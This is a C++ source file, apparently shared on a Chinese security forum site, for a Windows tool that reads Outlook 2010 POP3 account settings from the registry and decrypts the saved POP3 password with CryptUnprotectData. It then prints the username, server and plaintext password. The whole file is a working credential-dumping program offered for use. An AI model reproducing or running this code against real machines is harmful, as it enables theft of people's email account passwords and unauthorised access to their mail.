// 获取Outlook保存的密码
// 来自 http://www.mamicode.com/info-detail-516836.html
// 原理 http://securityxploded.com/outlookpasswordsecrets.php
// VS2012通过(MBCS字符集)
// Windows 7, Outlook2010
#include "stdafx.h"
#include <windows.h>
#include <iostream>
#include <cstdlib>
#include <stdio.h>
using namespace std;
#include <iostream>
#include <cstdlib>
#include <stdio.h>
using namespace std;
#pragma comment(lib, "crypt32.lib")
/*
WINCRYPT32API
BOOL
WINAPI
CryptUnprotectData(
__in DATA_BLOB* pDataIn, // in encr blob
__deref_opt_out_opt LPWSTR* ppszDataDescr, // out
__in_opt DATA_BLOB* pOptionalEntropy,
__reserved PVOID pvReserved,
__in_opt CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
__in DWORD dwFlags,
__out DATA_BLOB* pDataOut
);
*/
void opt(char* prog)
{
printf("Welcome [url=http://www.90sec.org]www.90sec.org[/url]\r\n");
printf("[-]:%s Get_pop3 passwords\r\n",prog);
}
int _tmain(int argc, _TCHAR* argv[])
{
opt(argv[0]);
printf("\r\n");
HKEY hKey;
// 其中00000003是用户序号, 根据自己的情况设定
LPCWSTR lpRun = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003";
//READ POP3 DATA define
//----------------------------------------
DWORD sizeBuff = 1000; //read length
DWORD dwtype = REG_BINARY; // reg type
BYTE reBuff[1000] = {0}; //save string length
long lRet; //Reg return values
BYTE SmtpServer[200] = {0}; //read reg String length
DWORD SMtplen = 200; //DWORD reg read length
BYTE SmtpUser[200] = {0};//read reg String length
DWORD SMtpUserlen = 200; //DWORD reg read length
//------------------------------------------
lRet= RegOpenKeyExW(HKEY_CURRENT_USER, lpRun, 0, KEY_READ, &hKey); //open reg
if (lRet != ERROR_SUCCESS)
{
printf("RegOpenKeyEx Failed. Ret=%d\r\n", lRet);
return 0;
}else
{
printf("RegOpenKeyEx Ing.....\r\n");
}
if (RegQueryValueExW(hKey,L"POP3 User",0,&dwtype,SmtpUser,&SMtpUserlen) == ERROR_SUCCESS) //query Pop3 Server address
{
//cout << "Smtp User:" << SmtpServer << endl;
printf("POP3 User:%S\r\n",SmtpUser);//print Pop3 user
}
if (RegQueryValueExW(hKey,L"POP3 Server",0,&dwtype,SmtpServer,&SMtplen) == ERROR_SUCCESS) //query Pop3 Server address
{
//cout << "Smtp User:" << SmtpServer << endl;
printf("Smtp Server:%S\r\n",SmtpServer);//print server address
}
if(RegQueryValueExW(hKey,L"POP3 Password",0,&dwtype,reBuff,&sizeBuff) == ERROR_SUCCESS) //query POP3 password
{
DATA_BLOB DataPassword;
DATA_BLOB DataOutput;
DataPassword.cbData = sizeBuff -1;
DataPassword.pbData = &reBuff[1];
if(CryptUnprotectData(&DataPassword,0,0,0,0,CRYPTPROTECT_UI_FORBIDDEN,&DataOutput)) //Crypt pop3 password
{
//cout << DataOutput.pbData << endl;
wcout << "POP3 Password: " << (wchar_t*)DataOutput.pbData; //print password
}else
{
cout << "Read error\r\n" << endl; //error
return 0;
}
return 0;
}
RegCloseKey(hKey);
return 0;
}